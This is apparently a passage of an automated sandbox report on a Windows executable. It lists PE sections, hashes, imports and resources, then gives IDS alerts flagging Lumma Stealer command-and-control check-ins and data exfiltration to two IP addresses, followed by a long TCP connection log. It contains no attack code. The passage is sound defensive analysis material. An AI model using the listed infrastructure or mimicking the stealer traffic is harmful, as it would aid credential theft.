                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x66e2.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xe0002f0x2f30
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x1000000x66e20x6800aced79e902ae27a028330595bd1eb48cFalse0.65478515625data6.072590767394516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x1070000xfd60x100098b5852fe7cbf1ae227944ba00d536abFalse0.567626953125data5.312168663390484IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x1002680x1f50PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0013722554890219
                                                                              RT_ICON0x1021b80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.4860659072416599
                                                                              RT_ICON0x1048200x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5398451730418944
                                                                              RT_ICON0x1059480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.650709219858156
                                                                              RT_DIALOG0x105db00x100dataEnglishUnited States0.5234375
                                                                              RT_DIALOG0x105eb00x11cdataEnglishUnited States0.6056338028169014
                                                                              RT_DIALOG0x105fcc0x60dataEnglishUnited States0.7291666666666666
                                                                              RT_GROUP_ICON0x10602c0x3edataEnglishUnited States0.8225806451612904
                                                                              RT_VERSION0x10606c0x3a0dataEnglishUnited States0.4105603448275862
                                                                              RT_MANIFEST0x10640c0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                              DLLImport
                                                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-28T21:35:52.982519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.37.209443TCP
                                                                              2024-12-28T21:35:53.839595+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737104.21.37.209443TCP
                                                                              2024-12-28T21:35:53.839595+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.37.209443TCP
                                                                              2024-12-28T21:35:55.105526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.37.209443TCP
                                                                              2024-12-28T21:35:55.897918+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449738104.21.37.209443TCP
                                                                              2024-12-28T21:35:55.897918+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738104.21.37.209443TCP
                                                                              2024-12-28T21:35:57.741369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.37.209443TCP
                                                                              2024-12-28T21:36:00.002405+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.37.209443TCP
                                                                              2024-12-28T21:36:02.211154+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753104.21.37.209443TCP
                                                                              2024-12-28T21:36:04.685957+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449759104.21.37.209443TCP
                                                                              2024-12-28T21:36:05.504971+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449759104.21.37.209443TCP
                                                                              2024-12-28T21:36:07.125925+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449765104.21.37.209443TCP
                                                                              2024-12-28T21:36:10.815856+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449774104.21.37.209443TCP
                                                                              2024-12-28T21:36:11.594130+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449774104.21.37.209443TCP
                                                                              2024-12-28T21:36:13.030490+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449779104.26.3.16443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 28, 2024 21:35:51.668456078 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:51.668497086 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:51.668764114 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:51.672116041 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:51.672143936 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:52.982444048 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:52.982518911 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:52.987103939 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:52.987112045 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:52.987339973 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:53.039464951 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.067199945 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.067219019 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.067280054 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:53.839585066 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:53.839663029 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:53.839716911 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.841383934 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.841404915 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:53.841414928 CET49737443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.841420889 CET44349737104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:53.848247051 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.848272085 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:53.848373890 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.848623991 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:53.848632097 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.105421066 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.105525970 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.112876892 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.112884998 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.113081932 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.114171028 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.114191055 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.114229918 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.897921085 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.897985935 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.898013115 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.898032904 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.898042917 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.898077011 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.898082972 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.898169041 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.898206949 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.898211956 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.914756060 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.914803982 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.914810896 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.922960997 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.923022032 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:55.923057079 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:55.976964951 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.099124908 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103002071 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103091955 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103190899 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.103213072 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103264093 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.103283882 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103420973 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103435993 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.103450060 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103471041 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.103477001 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.103496075 CET49738443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.103499889 CET44349738104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.483938932 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.483983994 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:56.484042883 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.484364033 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:56.484376907 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:57.741296053 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:57.741369009 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:57.742533922 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:57.742547035 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:57.742748022 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:57.745794058 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:57.745933056 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:57.745976925 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:57.746047020 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:57.746056080 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:58.720674992 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:58.720746040 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:58.720798969 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:58.721009970 CET49740443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:58.721024036 CET44349740104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:58.742230892 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:58.742257118 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:35:58.742347956 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:58.744616985 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:35:58.744623899 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.002326965 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.002404928 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.003612041 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.003638983 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.004085064 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.005491018 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.005594015 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.005611897 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.872997999 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.873075008 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.873152971 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.873347998 CET49747443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.873357058 CET44349747104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.950428009 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.950455904 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:00.950529099 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.950814009 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:00.950825930 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:02.211045980 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:02.211153984 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:02.212357044 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:02.212366104 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:02.212560892 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:02.213895082 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:02.214072943 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:02.214101076 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:02.214163065 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:02.214171886 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:03.194732904 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:03.194813013 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:03.194864035 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:03.195178986 CET49753443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:03.195185900 CET44349753104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:03.427989006 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:03.428049088 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:03.428123951 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:03.428388119 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:03.428423882 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:04.685878038 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:04.685956955 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:04.687058926 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:04.687063932 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:04.687273979 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:04.688379049 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:04.688473940 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:04.688486099 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:05.504987001 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:05.505068064 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:05.505117893 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:05.505228043 CET49759443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:05.505254030 CET44349759104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:05.814589977 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:05.814663887 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:05.814745903 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:05.815056086 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:05.815073967 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.125750065 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.125925064 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.126933098 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.126946926 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.127443075 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.128505945 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.129059076 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.129092932 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.129193068 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.129229069 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.129600048 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.129642010 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.133330107 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.133363962 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.134535074 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.134568930 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.138540983 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.138570070 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.138580084 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.138592958 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.138736010 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.138758898 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.138778925 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.141263962 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.141295910 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.179383039 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.180107117 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.180146933 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.180176020 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.180188894 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:07.180210114 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:07.180226088 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:09.551875114 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:09.551958084 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:09.554455042 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:09.554517984 CET49765443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:09.554526091 CET44349765104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:09.555819035 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:09.555849075 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:09.555994987 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:09.556211948 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:09.556225061 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:10.815774918 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:10.815855980 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:10.826842070 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:10.826854944 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:10.827112913 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:10.843421936 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:10.843460083 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:10.843483925 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:11.593997955 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:11.594070911 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:11.594199896 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:11.594304085 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:11.594316006 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:11.594327927 CET49774443192.168.2.4104.21.37.209
                                                                              Dec 28, 2024 21:36:11.594332933 CET44349774104.21.37.209192.168.2.4
                                                                              Dec 28, 2024 21:36:11.816576958 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:11.816598892 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:11.816683054 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:11.817102909 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:11.817116022 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.030361891 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.030489922 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:13.031907082 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:13.031915903 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.032114029 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.033128977 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:13.079338074 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.808465958 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.808506966 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.808533907 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.808562040 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.808578968 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:13.808593988 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.808614016 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:13.808659077 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.808938980 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:13.809072018 CET49779443192.168.2.4104.26.3.16
                                                                              Dec 28, 2024 21:36:13.809078932 CET44349779104.26.3.16192.168.2.4
                                                                              Dec 28, 2024 21:36:13.809098005 CET49779443192.168.2.4104.26.3.16
